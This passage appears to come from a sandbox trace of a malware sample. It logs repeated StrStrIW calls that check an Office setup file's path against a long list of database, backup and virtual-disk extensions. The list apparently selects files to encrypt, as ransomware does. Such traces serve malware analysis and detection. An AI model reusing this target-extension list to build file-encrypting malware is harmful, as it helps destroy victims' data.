lpSrch=".arc") returned 0x0 [0148.053] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ora") returned 0x0 [0148.053] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".alf") returned 0x0 [0148.053] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ask") returned 0x0 [0148.053] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".btr") returned 0x0 [0148.053] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".bdf") returned 0x0 [0148.053] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".cat") returned 0x0 [0148.053] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".cdb") returned 0x0 [0148.053] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ckp") returned 0x0 [0148.053] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".cma") returned 0x0 [0148.053] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".cpd") returned 0x0 [0148.054] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dacpac") returned 0x0 [0148.054] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dad") returned 0x0 [0148.054] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dadiagrams") returned 0x0 [0148.054] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".daschema") returned 0x0 [0148.054] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".db") returned 0x0 [0148.054] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".db-shm") returned 0x0 [0148.054] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".db-wal") returned 0x0 [0148.054] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".db3") returned 0x0 [0148.054] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dbc") returned 0x0 [0148.054] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dbf") returned 0x0 [0148.054] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dbs") returned 0x0 [0148.054] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dbt") returned 0x0 [0148.054] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dbv") returned 0x0 [0148.054] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dbx") returned 0x0 [0148.054] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dcb") returned 0x0 [0148.054] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dct") returned 0x0 [0148.054] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dcx") returned 0x0 [0148.054] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ddl") returned 0x0 [0148.054] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dlis") returned 0x0 [0148.055] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dp1") returned 0x0 [0148.055] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dqy") returned 0x0 [0148.055] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dsk") returned 0x0 [0148.055] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dsn") returned 0x0 [0148.055] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dtsx") returned 0x0 [0148.055] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dxl") returned 0x0 [0148.055] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".eco") returned 0x0 [0148.055] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ecx") returned 0x0 [0148.055] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".edb") returned 0x0 [0148.055] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".epim") returned 0x0 [0148.055] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".exb") returned 0x0 [0148.055] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fcd") returned 0x0 [0148.055] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fdb") returned 0x0 [0148.055] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fic") returned 0x0 [0148.055] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fmp") returned 0x0 [0148.055] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fmp12") returned 0x0 [0148.055] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fmpsl") returned 0x0 [0148.056] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fol") returned 0x0 [0148.056] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fp3") returned 0x0 [0148.056] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fp4") returned 0x0 [0148.056] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fp5") returned 0x0 [0148.056] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fp7") returned 0x0 [0148.056] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fpt") returned 0x0 [0148.056] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".frm") returned 0x0 [0148.056] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".gdb") returned 0x0 [0148.056] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".grdb") returned 0x0 [0148.056] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".gwi") returned 0x0 [0148.056] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".hdb") returned 0x0 [0148.056] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".his") returned 0x0 [0148.056] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ib") returned 0x0 [0148.056] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".idb") returned 0x0 [0148.056] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ihx") returned 0x0 [0148.056] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".itdb") returned 0x0 [0148.056] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".itw") returned 0x0 [0148.057] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".jet") returned 0x0 [0148.057] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".jtx") returned 0x0 [0148.057] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".kdb") returned 0x0 [0148.057] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".kexi") returned 0x0 [0148.057] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".kexic") returned 0x0 [0148.057] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".kexis") returned 0x0 [0148.057] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".lgc") returned 0x0 [0148.057] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".lwx") returned 0x0 [0148.057] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".maf") returned 0x0 [0148.057] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".maq") returned 0x0 [0148.057] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mar") returned 0x0 [0148.057] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mas") returned 0x0 [0148.057] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mav") returned 0x0 [0148.057] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mdb") returned 0x0 [0148.057] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mdf") returned 0x0 [0148.057] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mpd") returned 0x0 [0148.057] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mrg") returned 0x0 [0148.058] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mud") returned 0x0 [0148.058] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mwb") returned 0x0 [0148.058] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".myd") returned 0x0 [0148.058] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ndf") returned 0x0 [0148.058] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nnt") returned 0x0 [0148.058] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nrmlib") returned 0x0 [0148.058] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ns2") returned 0x0 [0148.058] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ns3") returned 0x0 [0148.058] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ns4") returned 0x0 [0148.058] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nsf") returned 0x0 [0148.058] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nv") returned 0x0 [0148.058] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nv2") returned 0x0 [0148.058] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nwdb") returned 0x0 [0148.058] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nyf") returned 0x0 [0148.058] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".odb") returned 0x0 [0148.058] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".oqy") returned 0x0 [0148.058] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".orx") returned 0x0 [0148.058] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".owc") returned 0x0 [0148.059] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".p96") returned 0x0 [0148.059] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".p97") returned 0x0 [0148.059] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".pan") returned 0x0 [0148.059] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".pdb") returned 0x0 [0148.059] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".pdm") returned 0x0 [0148.059] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".pnz") returned 0x0 [0148.059] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".qry") returned 0x0 [0148.059] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".qvd") returned 0x0 [0148.059] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".rbf") returned 0x0 [0148.059] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".rctd") returned 0x0 [0148.059] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".rod") returned 0x0 [0148.059] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".rodx") returned 0x0 [0148.059] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".rpd") returned 0x0 [0148.059] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".rsd") returned 0x0 [0148.059] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sas7bdat") returned 0x0 [0148.059] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sbf") returned 0x0 [0148.059] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".scx") returned 0x0 [0148.059] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sdb") returned 0x0 [0148.060] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sdc") returned 0x0 [0148.060] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sdf") returned 0x0 [0148.060] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sis") returned 0x0 [0148.060] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".spq") returned 0x0 [0148.060] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sql") returned 0x0 [0148.060] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sqlite") returned 0x0 [0148.060] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sqlite3") returned 0x0 [0148.060] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sqlitedb") returned 0x0 [0148.060] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".te") returned 0x0 [0148.060] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".temx") returned 0x0 [0148.060] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".tmd") returned 0x0 [0148.060] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".tps") returned 0x0 [0148.060] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".trc") returned 0x0 [0148.060] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".trm") returned 0x0 [0148.060] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".udb") returned 0x0 [0148.060] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".udl") returned 0x0 [0148.060] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".usr") returned 0x0 [0148.061] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".v12") returned 0x0 [0148.061] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vis") returned 0x0 [0148.061] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vpd") returned 0x0 [0148.061] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vvv") returned 0x0 [0148.061] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".wdb") returned 0x0 [0148.061] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".wmdb") returned 0x0 [0148.061] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".wrk") returned 0x0 [0148.061] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".xdb") returned 0x0 [0148.061] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".xld") returned 0x0 [0148.061] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".xmlff") returned 0x0 [0148.061] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".abcddb") returned 0x0 [0148.061] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".abs") returned 0x0 [0148.061] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".abx") returned 0x0 [0148.062] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accdw") returned 0x0 [0148.062] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".adn") returned 0x0 [0148.062] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".db2") returned 0x0 [0148.062] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fm5") returned 0x0 [0148.062] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".hjt") returned 0x0 [0148.062] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".icg") returned 0x0 [0148.062] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".icr") returned 0x0 [0148.062] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".kdb") returned 0x0 [0148.062] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".lut") returned 0x0 [0148.062] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".maw") returned 0x0 [0148.062] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mdn") returned 0x0 [0148.062] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mdt") returned 0x0 [0148.062] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vdi") returned 0x0 [0148.062] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vhd") returned 0x0 [0148.062] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmdk") returned 0x0 [0148.062] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".pvm") returned 0x0 [0148.062] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmem") returned 0x0 [0148.063] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmsn") returned 0x0 [0148.063] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmsd") returned 0x0 [0148.063] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nvram") returned 0x0 [0148.063] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmx") returned 0x0 [0148.063] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".raw") returned 0x0 [0148.063] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".qcow2") returned 0x0 [0148.063] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".subvol") returned 0x0 [0148.063] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".bin") returned 0x0 [0148.063] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vsv") returned 0x0 [0148.063] StrStrIW (lpFirst="C:\\MSOCache\\All 